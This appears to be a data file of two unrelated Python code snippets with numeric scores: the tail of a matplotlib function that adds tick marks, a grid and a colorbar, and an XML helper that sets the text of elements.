axes.set_xticks(minor_xticks, minor=True)
axes.set_yticks(minor_yticks, minor=True)
axes.grid(grid, which='major')
if colorbar is True:
if cb_orientation == 'vertical':
divider = _make_axes_locatable(axes)
cax = divider.append_axes("right", size="2.5%", pad=0.15)
cbar = _plt.colorbar(cim, cax=cax, orientation=cb_orientation)
else:
divider = _make_axes_locatable(axes)
cax = divider.append_axes("bottom", size="5%", pad=0.5)
cbar = _plt.colorbar(cim, cax=cax,
orientation=cb_orientation)
if cb_label is not None:
cbar.set_label(cb_label, fontsize=axes_labelsize)
cbar.ax.tick_params(labelsize=tick_labelsize)
if ax is None:
return fig, axes | 0.002637 |
def set_elements_text(parent_to_parse, element_path=None, text_values=None):
"""
Assigns an array of text values to each of the elements parsed from the parent. The
text values are assigned in the same order they are provided.
If there are less values then elements, the remaining elements are skipped; but if
there are more, new elements will be inserted for each with the remaining text values.
"""
if text_values is None:
text_values = []
return _set_elements_property(parent_to_parse, element_path, _ELEM_TEXT, text_values) | 0.008787 |